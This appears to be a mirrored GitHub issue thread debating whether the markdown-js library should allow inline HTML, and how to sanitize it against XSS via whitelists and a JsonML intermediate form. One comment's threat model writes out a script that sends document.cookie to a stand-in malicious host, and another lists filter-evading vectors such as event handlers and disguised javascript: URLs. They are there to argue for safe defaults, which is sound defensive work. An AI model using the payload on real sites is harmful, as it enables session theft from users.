Git Product home page Git Product logo

Comments (56)

mansu avatar mansu commented on July 19, 2024 2

+1 for not escaping html in markdown parser.

If this not going to be fixed, please say so at the top of the README. I just wasted 2 days playing with this library and need to rewrite my parser now.

from markdown-js.

sp avatar sp commented on July 19, 2024 1

I think this is more than a "nice to have" - it's kind of a basic feature of markdown. See http://daringfireball.net/projects/markdown/syntax#html.

from markdown-js.

ashb avatar ashb commented on July 19, 2024 1

It's basic but my personally view is that its a really bad idea to mix markdown and HTML.

If someone writes the code to do this I'll happily accept it - I'm just not going write it myself.

from markdown-js.

ashb avatar ashb commented on July 19, 2024 1

We've got a (Maruku dialiect)[http://maruku.rubyforge.org/proposal.html] that supports their metadata proposal so you can do:

## Heading ## {: #my-id }

This is a para
{ .my-class }

to add id's and classes

from markdown-js.

awirick avatar awirick commented on July 19, 2024 1

+1 - i'd use this for tables and other non-markdown supported tags (video).

from markdown-js.

xavi- avatar xavi- commented on July 19, 2024

+1

from markdown-js.

nddrylliog avatar nddrylliog commented on July 19, 2024

+1 ! :)

from markdown-js.

nddrylliog avatar nddrylliog commented on July 19, 2024

Well if markdown had something for styling (if only defining CSS classes..), I wouldn't need it. Does anyone have ideas?

from markdown-js.

xavi- avatar xavi- commented on July 19, 2024

My main issue with the lack of HTML support is that it makes tables much harder. I know there are various implementations/proposals for a table syntax in markdown, but it does not seem like markdown-js supports any.

from markdown-js.

jarrodbell avatar jarrodbell commented on July 19, 2024

+1 required for any table support (including CSS for styling the tables globally via <STYLE> tags)
Anyone recommend another parser that supports this?

from markdown-js.

jarrodbell avatar jarrodbell commented on July 19, 2024

Found @cadorn fork which includes HTML inline and works great!
https://github.com/cadorn/markdown-js

from markdown-js.

ashb avatar ashb commented on July 19, 2024

Can test that a bit more thoroughly and let me know if it works and then we'll get it merged in.

from markdown-js.

jarrodbell avatar jarrodbell commented on July 19, 2024

I've used it for extensive table creation, and inline <STYLE> tags and it works perfect.

from markdown-js.

kragen avatar kragen commented on July 19, 2024

This is a duplicate of issue 11.

I don't think cadorn's fork should be merged in in its current state; although it looks like a good solution for applications like writing blog posts you host on your own server, it's only applicable in cases where you completely trust the source of the Markdown, and as such, it would open XSS security holes in applications that are currently using markdown-js to render input across trust boundaries. I'm pasting here the comment that I made on his commit:

So, while on one hand I really want this feature for my application of markdown-js, on the other hand I really want a way to filter the HTML to keep out things like the following:

  • unclosed <blockquote>
  • <script>
  • <a onmouseover>
  • <a href="jscript:...">
  • <a href="mocha:...">
  • <a href=" javascript:...">
  • <iframe>
  • <img width=1 height=1 src="http://...">
  • other things not mentioned here.

I think I'd also be a little happier with something other than false as the tag for as-is blocks. It is JSON-serializable, I suppose... I don't suppose there's a JSONML spec for this kind of thing, is there? Last I checked, the JSONML spec wasn't even clear as to whether the contents of JSONML elements were supposed to be CDATA or PCDATA.

I think another thing that we run into trouble with is entity handling. I ought to be able to write &copy; 2011 Kragen Javier Sitaker in a Markdown document and have the © entity get passed through to the output (as you can see that it is in this comment). And the list from the spec, "<span>, <cite>, or <del>", is just a list of examples, not a complete list of span-level HTML tags; the intent is that any span-level HTML tag can be used in those contexts.

What this adds up to is that we probably need to run all the strings that are the contents of paragraphs, list items, or headers, through a more or less actual HTML parser that can be supplied with whitelists of tags, attributes, and URL schemes, so that it can successfully pass through the subset of well-formed HTML that's right for the application in question. In modern browsers, we could actually use DOMParser, but in Node we might have to use our own. It probably doesn't have to be quite as robust as a browser's parser, since many applications (and basically all applications that use some arbitrary subset of HTML) will give the user a chance to preview and fix their Markdown, so if it barfs on overlapping span-level tags (as GitHub sort of does: <b>overlapping <i>span-level</b> tags</i>) or unclosed tags, it's not a big deal.

I'm not proposing that you should do all this work for me; I was just checking out the network to see if someone had already done it. It looks like you're the one that's come closest. Would it be useful to you if I did what I'm describing? Would it remove the need for the code in this commit for you?

(Edited: fixed a typo.)

from markdown-js.

cadorn avatar cadorn commented on July 19, 2024

@kragen - I am all for a more intelligent HTML parser the way you describe it. I am using this lib to render documentation for my internal projects so there was no need to check the HTML. Should be pretty easy to hook into what I have started.

from markdown-js.

kragen avatar kragen commented on July 19, 2024

(I've bolded some phrases below to facilitate skimming; hope it's not too annoying when you're reading straight through.)

Okay, well, I guess I'm committed to implementing this, then. Here's what I'm thinking about how to do it. Is this a good way to do it? I'd really appreciate comments before I go haring off without the benefit of other people's advice and experience.

  • JsonML doesn't have a spec written in English, as far as I can tell, just a BNF grammar and some example implementations in XSLT and JS with the DOM. As far as I can tell, both of the example implementations unescape entity references on input and re-escape them on output, although there's no English text to explain whether this is intentional or a bug.

I assert that this is a bug, because it robs JsonML of any way to represent SGML entity references. I propose that JsonML strings should be treated as PCDATA — allowed to contain entities but not tags — rather than CDATA (plain text) or HTML (text with entities and tags).

  • Accordingly, when we parse a code block or inline code chunk, we should escape & and < in it, and when we parse any other node, we should run it through an HTML parser to break it down into subnodes, ensuring that it's well-formed, modulo possible references to entities that we don't know about. (I don't propose to include a list of all defined HTML entities into markdown-js.) This means that in general we will not escape HTML on output. It also means that the effect of poorly-nested input tags will be limited to at most one parse-tree node.
  • The HTML parser used as an input filter should be configurable with whitelists of tags, attributes per tag, and URL schemes per attribute. By default it should be configured with a fairly strict filter, blocking even inline images and iframes with off-host URIs, and of course any possible vector for JS. This will annoy people like cadorn, for whom such filtering is unnecessary, and they need to have an easy way to turn off the whitelists (if not the HTML parsing entirely). But I think that is better than someone doing a git pull on markdown-js and getting privacy and XSS problems added to their application. That is, the default should be safe.

I'm hoping I can use an existing pure-JS HTML parser — say, jsdom's, or kn_htmlsafe_htmlSanitize, or NodeHtmlParser — rather than hacking one together from scratch. (As a fallback, I could write a very simple parser for the tags-and-attributes subset of XHTML.) I'm a little worried about the performance implications of this; markdown-js is already a little slower than Showdown, and this could make the matter worse. Does anybody have recommendations here?

(In the case where it's running in a modern browser, we could use DOMParser as an optimization, but enough people are using markdown-js in Node that I think it doesn't make sense to depend on that.)

(Elijah Insua's MIT-licensed pure-JS implementation of the W3C DOM)

(Ben Sittler's 3-clause BSD-licensed whitelisting, but not particularly configurable, pure-JS HTML sanitizer)

(A forgiving HTML/XML/RSS parser written in JS for both the browser and NodeJS)

Other variations:

  1. Parse HTML on output, not input, instead of building JsonML nodes in the intermediate representation.

This has the disadvantage that it would make some kinds of processing on the intermediate representation harder — for example, in yamemex, I want to support Twitter-style #hashtags, and that will be easier to do if I can tell which hash
marks are in the text of the document and which are in some URL somewhere. Also, any markup added by intermediate-representation processing would be prone to being stripped by the output filter.

The advantage is that it would probably make the intermediate processing run faster and take less memory, and it expands the HTML parsers that can be used beyond just those that build a parse tree, which is slow; HTML parsers that simply produce sanitized HTML could be used. Also, the intermediate representation would be simpler, since it wouldn't have HTML tag names in it. This would involve changing the intermediate "JsonML" representation to have HTML rather than CDATA or PCDATA contents — so & would be represented as &amp; in the intermediate representation, not as &, and <b> would mean <b>.
2. Leave the semantics of the intermediate representation unchanged aside from adding more tag names, parsing HTML on input and using an exhaustive list of HTML entities to convert things like &copy; © and &ddagger; ‡ to Unicode characters. I think this would be a hassle to maintain. (Note that ‡ doesn't show up correctly here because GitHub has undertaken to maintain such a list for their Markdown implementation — and failed. Visit the URL data:text/html,&ddagger; to see that your browser supports it.)
3. Rather than parsing HTML on input or when rendering each node for output, pass through HTML tags from input to output (except inside code blocks, of course) and then run a final HTML-sanitizing pass on the output string to ensure that it's well-formed and safe. This has the advantage of very minimal coupling, and it would handle e.g. <img src="http://webbugs.example.com/"> the same way regardless of whether it was generated from ![ ](http://webbugs.example.com/) or just included literally in the source; the disadvantages are that it may be even slower than the other alternatives (making an additional pass over markup whose well-formedness and safety is guaranteed by construction), it could be a little more bug-prone ("Where did all of my <ol>s go? Oh, I left ol out of the whitelist."), and it doesn't facilitate intermediate processing in any way.

(My project using markdown-js for, ultimately, social bookmarking.)

So, what do other people think? The above represents a few hours of me thinking about the problem, but I anticipate that implementing it will take at least a few days of work, so I'd really appreciate help in thinking this through before I jump in.

from markdown-js.

kragen avatar kragen commented on July 19, 2024

I guess I should elaborate a little bit on the kinds of use cases/threat models I'm thinking of here:

  1. Using Markdown to write your own blog on your own domain, which is cadorn's use case. There's little benefit to filtering your markup in this case; the worst case is that your blog is formatted funny because you forgot to close a <blockquote> or something. Unless you copy and paste a chunk of HTML from somewhere else, which brings us to:

  2. Using Markdown to render stuff pulled (manually or automatically) from another origin. The risk here is that the author of the stuff may have included some code to take actions on your behalf and exfiltrate your private information (known as "cross-site scripting"), either in a straightforward way such as <script>im=new Image(); im.src="http://malicious.example.com/?"+document.cookie</script> or some more subtle way designed to evade naïve filters. Doing this reliably requires that you use a whitelist rather than a blacklist so you don't end up like the stupid losers who built MySpace.

    (As defined in the same-origin policy.)

    (Samy Kamkar explains the unbelievably incompetent security measures he hacked around to crash MySpace.)

    Note that this category includes things like blogging software where someone might plausibly copy and paste a piece of someone else's web page in order to quote it.

  3. Using Markdown to render stuff sent by a possible spammer or by someone else who has an illegitimate interest in knowing whether you have read it — such as email — in which case you do not want to confirm to the spammer that you have read it. In this case want to filter out anything whose rendering will generate network traffic (to anywhere other than the source of the rendered document, that is), such as <img src> and <iframe>, as well as all the items covered in #2 above.

I believe yamemex is in category 2, because I excerpt the pages I bookmark with it all the time. markdown-js is currently safe for this case because it escapes all HTML, but I want it to let through safe HTML. I think that almost any server-based web application that renders Markdown taken from client requests is in category 2, if not category 3, and I think (though I don't know) that many markdown-js applications do that.

from markdown-js.

cadorn avatar cadorn commented on July 19, 2024

I would pull in something like:

Don't parse on output. I think it should make it into the JsonML structure and be sanitized by then.

Keep defaults safe and write minimal code using third party tested libraries where possible.

from markdown-js.

kragen avatar kragen commented on July 19, 2024

Oh hey! That looks nice! Thanks for finding that! I wonder how much of Caja I'd have to pull in to get it to work. Doesn't look like that much.

In general I'm not that enthusiastic about the quality of random third-party "tested" libraries in JS, but Caja is an exception; the project leads are programmers who use JavaScript, not "JavaScript programmers", and they are good ones.

So if the code can be made to do the job (which is still an "if"), that looks like a better option than the alternatives I suggested earlier. Maybe if I dig in I'll change my mind.

Apache 2.0 license should be okay, right, Ash?

from markdown-js.

ashb avatar ashb commented on July 19, 2024

Good work, your long comment

  • PCDATA vs CDATA: you make a good case for it being PCDATA.

  • At which point should the escaping of < or & be done? In the Markdown JsonML or when converting that to HTML JsonML? (Doing it at the first stage seems slightly off to me at first glance, but I've not thought through the implications of this.

  • the default should be safe

    Absolutely.

Apache 2 is compatible with BSD right? For preference anyway I'd prefer if you just require another lib/module than pull the source in directly. If thats much of a pain to achieve then a subdir under lib/caja/ works too.

Above all else it seems you've got it well thought out. So long as there is some docs on how it behaves and it's not too tightly tied to only working in one way I'm more than happy to accept a pull request. Bonus points for having tests - I'm happy if these only run under node so long as the code itself is portable to browsers.

from markdown-js.

FireyFly avatar FireyFly commented on July 19, 2024

I'll pitch in on this one. I started using this library yesterday and wrote my own small modifications to markdown.js to handle the two problems presented in this issue (HTML tags and character entities). This was before checking the issues page finding this recently-discussed topic. :)

My use case is, for now, limited to my own usage (just like cadorn), but it'd be great with something more reliable than what I currently have. My main problem was actually block-level HTML, that I didn't want to be wrapped in a <p>, so my problem is slightly different.

As for the suggestion of pulling in Caja, I think it sounds like a great idea! Might be good to make it optional though, since, well, it is an additional dependency. Perhaps let it be an option which defaults to on, so that people who don't need the feature don't need to have Caja installed (or can remove it if it has to be bundled in lib/).

Anyway, great to see that this is being worked on/that I'm not the only one who want HTML support.

from markdown-js.

kragen avatar kragen commented on July 19, 2024

Hey, I just realized I never responded to the comments above. Didn't do anything this weekend, or yesterday.

Everything is compatible with BSD.

I'm trying to get the regression tests running and fix some smaller bugs first — see #26 if curious.

from markdown-js.

ap avatar ap commented on July 19, 2024

@cadorn:

Don’t parse on output.

Why not…? That is what has always seemed most sensible to me – for the reason @kragen mentioned, that it treats all tags the same whatever their provenance. After all Markdown is by intent a shorthand for the most common of HTML. Whether you write *this* or <em>this</em> should really be immaterial, and both equally allowed or not.

from markdown-js.

cadorn avatar cadorn commented on July 19, 2024

@ap This library is great because it has the JsonML intermediate layer. I send the JSON to the client and have the client convert if from JSON to HTML. I think HTML should be sanitized as it enters JsonML. The conversion from JsonML to HTML should be a simple dumb transformation so alternative output formats can be easily targeted.

What exactly are the specific problems with this approach (the comments above are too verbose to follow).

from markdown-js.

ashb avatar ashb commented on July 19, 2024

My favoured approach would be to have the HTML parsed and converted into JsonML for two reasons.

The first is as cadorn mentioned. The second is if you parse it into JsonML it should be easier to sanitize/limit the tags that are allowed.

@ap's comment sounds like violent agreement - i.e. you both want the HTML parsed?

from markdown-js.

ap avatar ap commented on July 19, 2024

Hmm. Basically I consider a Markdown implementation incomplete unless all constructs that can be written using Markdown shorthand can also be written explicitly using the equivalent HTML – i.e. *this* and <em>this</em> should come out the same. (Likewise for <ol><li> and 1., explicit <p> and double newline, etc. etc.)

So if one is filtered, the other should be too, and if not, then neither should be.

Sanitising at the output stage (after the Markdown has become HTML) has the advantage that a) this equivalence just falls out of the implementation directly with zero further effort and b) the sanitiser is not coupled to the Markdown processor.

If you want to sanitise using an intermediate representation that differentiates between Markdown shorthand and explicit HTML then I guess you’d need to use a mapping table or function from Markdown to HTML so that the sanitiser can use it to treat Markdown shorthand syntax as if it were the implied HTML. That would work. The obvious disadvantage is that you are then effectively converting the Markdown to HTML twice, once for the sanitiser and once for output. However, if sanitising happens server-side and the output conversion on the client, then that may be worthwhile anyhow.

(It would save you the re-parsing using a completely decoupled HTML parser. And maybe the mapping during the sanitisation stage is cheap enough that it is negligible anyway.)

As for targeting alternative output formats, that is essentially a question of converting HTML to the output format in question. Again, by design and intent, Markdown is HTML, just an alternative form that supplies shorthand syntax for a chosen subset of tags. You can convert either all of HTML to the output format or only a defined subset, take your pick – but you convert HTML either way. (E.g. you could pick the subset that only covers the tags which have Markdown shorthands, and that’s fine. Note what this way of looking at it implies: that *this* and <em>this</em> come out the same. Once again.)

Does this help?

from markdown-js.

cadorn avatar cadorn commented on July 19, 2024

What if we convert all known HTML tags (that correspond to markdown syntax) to markdown on input and leave the remaining HTML nodes as HTML (after sanitizing them). This would give a JsonML graph with markdown and HTML nodes allowing for Markdown syntax within HTML content.

We can then have a special tag with some options to optionally warp a chunk of HTML to customize how it is to be handled (markdown in content on pure HTML).

On the JsonML -> HTML side any HTML nodes just get dumped.

This may be the best solution but harder to implement using a third party library unless you get more into the guts of it.
We need super fast HTML chunk sanitation and a list of html tags to decide what to do.

from markdown-js.

ap avatar ap commented on July 19, 2024

That would work, I think. One thing though, things like <em style="font-size: 2em"> cannot be mapped in the HTML→Markdown direction so there is a likelihood that they will be rejected entirely, whereas if you map Markdown→HTML for sanitisation then this tag would probably get its style attribute stripped but then still be allowed through as a bare <em>.

OTOH if you build a hard-coded Markdown-based list of allowed tags into the sanitiser you can get that effect even with a HTML→Markdown mapping. (Which then means you cannot avoid running the sanitiser by simply dropping all explicit HTML tags, because these hard-coded tags must still be allowed through even if nothing else is. But that’s neither here nor there since Markdown = HTML anyway, so either you don’t sanitise at all or you sanitise both forms…)

from markdown-js.

ashb avatar ashb commented on July 19, 2024

@ap attributes are possible, certainly at the JsonML level since the Maruku dialect support this via: *a*{: style="font-size: 2em" } - the JsonML for it would be [ "em", { "style="font-size: 2em" }, "a" ] (from memory so might be slightly off).

from markdown-js.

ap avatar ap commented on July 19, 2024

I don’t mean whether it is possible to parse them, I mean how they are treated by the sanitiser. If the sanitiser is configured to disallow everything, it should still allow <em style="..."> to pass through as a stripped <em> (if Markdown’s asterisk syntax is permitted), just as output sanitisation after conversion to HTML would behave.

Then if the sanitiser implements equivalence of HTML and Markdown by first mapping HTML to Markdown where there is equivalent Markdown syntax, as @cadorn proposed, then edge cases like this which only half map to Markdown are likely not to work quite like they would with output sanitisation – unless care is taken to support them explicitly.

A good test suite is probably of the essence to ensure that the intent of the explicit support is preserved in the future, though! The separate output HTML filter stage has the advantage that this will all just work as desired by definition, implicitly – it’s robust in a way inline sanitisation is not, albeit, of course, at a performance penalty that we are trying to avoid here.

from markdown-js.

cadorn avatar cadorn commented on July 19, 2024

This lib is for Markdown -> JsonML -> HTML conversion.
We want it to also do Markdown + HTML -> JsonML -> HTML with various options/configurations to allow inline makrdown in HTML and HTML chunks either sanitized or unsanitized.

I have no problem with not being able to go backwards from the resulting HTML to Markdown + HTML if the source HTML used non-standard tags. Warning can be thrown if this happens during the Markdown + HTML -> HTML conversion.

If someone wants bi-directional conversion certain rules must be followed which are too restrictive for many cases.

I want to write website content in Markdown + HTML and want the conversion with HTML and inline Markdown in HTML to JsonML without sanitation as I have control over the source. In this case I want all HTML attributes to come through.

I also want the public to edit markdown + HTML for comments etc... in which sanitation is a must.

I am not going to discuss the same point back and forth any more as I think @ashb and I are on the same page for the overall approach. We just need to work out the details and get coding.

from markdown-js.

ap avatar ap commented on July 19, 2024

Uh.

It was you who brought up the HTML→Markdown mapping, not me. I never once suggested that, I did not even find any considerations on that use case, and I certainly never pushed for it as a user-visible feature of the library. Trying to convince me that the purpose of markdown-js is Markdown→HTML conversion is a waste of your time – that is already clear to me and I have been talking about only that all along.

If you did not understand the issue I explained, and you can still be bothered to try to, I continue to be willing to explain. If you are tired of the discussion and would rather just go ahead with whatever instead of talk about it, that’s also fine. Just please do not put words in my mouth and then drop the discussion over what I am supposed to have said – all the more so when that thing actually came from yourself.

from markdown-js.

cadorn avatar cadorn commented on July 19, 2024

I did not mean to put words into your mouth. I don't think I ever suggested HTML -> Markdown. If I did that was a misunderstanding.

I guess I don't understand the issue you are explaining. Can you put it into as few words as possible in the context of my last comment?

from markdown-js.

ap avatar ap commented on July 19, 2024

No problem.

I was referring to this bit from you:

What if we convert all known HTML tags (that correspond to markdown syntax) to markdown on input and leave the remaining HTML nodes as HTML (after sanitizing them).

This is workable, and will mostly fulfil the criterion I was talking about (that if * is allowed then <em> also should be). But consider what happens if the user types <em onclick="...">.

In the scenario where you sanitise by parsing the output, the sanitiser would certainly be configured to allow em elements (because otherwise it would filter out all emphasis) but certainly would not allow onclick attributes (hello XSS!). So what the user who typed <em onclick="..."> would get is a bare <em> tag.

Now if it works the way you suggested, then you will map <em>this</em> to the moral equivalent of *this* (at the JsonML level) in the pre-sanitiser stage. But you cannot do the same for <em onclick="...">. And then if the sanitiser is configured to allow nothing, it still needs hard-wired knowledge of what is expressible in Markdown, so that it will know to output a stripped <em> tag when it encounters that input, instead of stripping it out completely.

Does that help?

from markdown-js.

cadorn avatar cadorn commented on July 19, 2024

<em onclick="..."> would be mapped to *this* + attribute map in JsonML from which you can get <em onclick="..."> back on output if sanitize is switched off or onlick attr is allowed.

I think we need to hard-wire the Markdown <-> HTML tag mappings anyway to make any of this work.

Looks like we just need a HTML -> JsonML parser and a sanitizer that works on JsonML. It should not be too difficult to modify a good/portable/purejs HTML parser to do that for us.

@ap So are we on the same page now?

from markdown-js.

ap avatar ap commented on July 19, 2024

<em onclick="..."> would be mapped to *this* + attribute map in JsonML

Ahhh. Nice. That addresses the issue I was talking about then, excellent.

Yes, I believe we’re on the same page.

from markdown-js.

ashb avatar ashb commented on July 19, 2024

Looks like we just need a HTML -> JsonML parser and a sanitizer that works on JsonML

Agreed. But this also seems like a lot of work if you wan't to deal with less than well formed HMTL - I would be happy for badly formed HTML to just fall back to being parsed as markdown (i.e you'd see literal < in the output etc. etc.) Thoughts?

from markdown-js.

ap avatar ap commented on July 19, 2024

Maybe it’s possible to tie in an existing HTML5 parser?

Otherwise just showing syntactically bad tags as literal text is fine with me.

(Maybe do that by default with the option of adding a parser so that people can pay the cost only if they want it.)

from markdown-js.

cadorn avatar cadorn commented on July 19, 2024

@ashb Good suggestion. I think it will come down to the HTML parser.

@ap Yes. I think we should definitely try and re-use an existing parser and convert the AST to JsonML.

from markdown-js.

cadorn avatar cadorn commented on July 19, 2024

This list may be a good resource to ask for a HTML to JsonML converter or suggestion about which HTML parser to use: https://groups.google.com/group/js-tools

Do we have a spec for JsonML?

from markdown-js.

xavi- avatar xavi- commented on July 19, 2024

The grammar for JsonML is list on the website (http://www.jsonml.org/) if that's what you're looking for

from markdown-js.

ashb avatar ashb commented on July 19, 2024

And in terms of which node names we use, we kinda just made them up. See... https://github.com/evilstreak/markdown-js/blob/master/lib/markdown.js#L1470-1559

from markdown-js.

axefrog avatar axefrog commented on July 19, 2024

Why are you guys overcomplicating this? Stick an option in there to allow inline html and leave it at that. Default it to false if you want to. Trying to make the decision for the developer that you need to protect them from scenarios (i.e. cross-site scripting) that are outside the scope of translating markdown to html just causes the library to become bloated, less maintainable and annoys all the people who are expecting it to behave as per the original markdown specification.

I suggest you read http://daringfireball.net/projects/markdown/syntax#html - nowhere does it specify that you should escape HTML tags.

If you're going to make it support less than the markdown specification at a minimum, or behave contrary to how markdown should behave, then you should call it something other than markdown and remove the hold on the "markdown" identifier in the npm registry, as there are a huge number of developers out there who see this library as the "preferred" library for markdown in node.js (or otherwise) and then start using it only to discover that you don't support the proper markdown specification.

from markdown-js.

ashb avatar ashb commented on July 19, 2024

Even a simple 'allow inline HTML' flag needs some level of HTML parsing to know when to switch back to parsing Markdown again:

Note that Markdown formatting syntax is not processed within block-level HTML tags. E.g., you can’t use Markdown-style emphasis inside an HTML block.

I'm personally against putting inline HTML in my markdown as it just feels wrong to me which is why I haven't written the code do to this yet. If someone submits a pull request that achieves even simple inline HMTL and has some tests I'm more than happy to merge it in.

from markdown-js.

ap avatar ap commented on July 19, 2024

I’m personally against putting inline HTML in my Markdown as it just feels wrong to me

You have not attained Markdown nature yet, Ash. :-)

from markdown-js.

ashb avatar ashb commented on July 19, 2024

Just so you are all aware: replying with "+1" and nothing else makes me less likely to want to work on this.

It's going to happen at some point but you aren't helping. I'm going to delete those comments because they just add noise.

from markdown-js.

adam-stokes avatar adam-stokes commented on July 19, 2024

@ashb any word on this bug? it's been a couple years so just curious if this will be implemented or if you've decided not to..

from markdown-js.

misterdai avatar misterdai commented on July 19, 2024

It'd be nice to have an update on this issue. I ran into it myself but side-stepped it for now by escaping HTML on the way into the Markdown parser. So > would end up at &amp;gt; and I'd replace them on the content that comes back out. Not the nicest route to take but didn't want to muck around with the module itself (for what I was working on).

Ignore my workaround, it didn't allow for code snippets :-(

from markdown-js.

kevinSuttle avatar kevinSuttle commented on July 19, 2024

Yeah I'm just noticing the entity substitution also. Not the biggest deal since a lot of browsers know what it means, and render it accordingly, but still, it'd be nice.

from markdown-js.

codingisacopingstrategy avatar codingisacopingstrategy commented on July 19, 2024

For those asking for updates, there have been a number of pull requests, the most recent of which is #98

from markdown-js.

adam-stokes avatar adam-stokes commented on July 19, 2024

I wouldn't hold your breath it doesn't look like the maintainer is planning on doing anything at all.

from markdown-js.

codingisacopingstrategy avatar codingisacopingstrategy commented on July 19, 2024

From the threads I get the impression that this functionality is not really near to the heart of the maintainer, but (s)he hasn’t explicitly said he’ll refuse pull requests… The linked pull request is still open…

I asked for a comment on what is blocking the pull request so that we know if there is a way to help out?

cheers,

from markdown-js.

axefrog avatar axefrog commented on July 19, 2024

Guys, there are better alternatives nowdays anyway:
Marked: https://github.com/chjj/marked
MarkdownDeep: http://www.toptensoftware.com/markdowndeep/ / https://www.npmjs.org/package/markdowndeep
Both support HTML and have plenty of great features

from markdown-js.

codingisacopingstrategy avatar codingisacopingstrategy commented on July 19, 2024

That depends on what you are looking for; for a project we needed to extend Markdown with a new dialect, and this was much easier to do in markdown-js then in marked, for example. I’d still be really happy with an HTML supporting markdown.js

from markdown-js.

foolyoghurt avatar foolyoghurt commented on July 19, 2024

@axefrog Thanks for sharing. Marked is awesome!

from markdown-js.

luishdez avatar luishdez commented on July 19, 2024

I agree with the other comments, this parser should not be aware of things like XSS that's the developer problem and should be handled by other parts of the application ( that's obvious )

Moving to marked too

from markdown-js.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.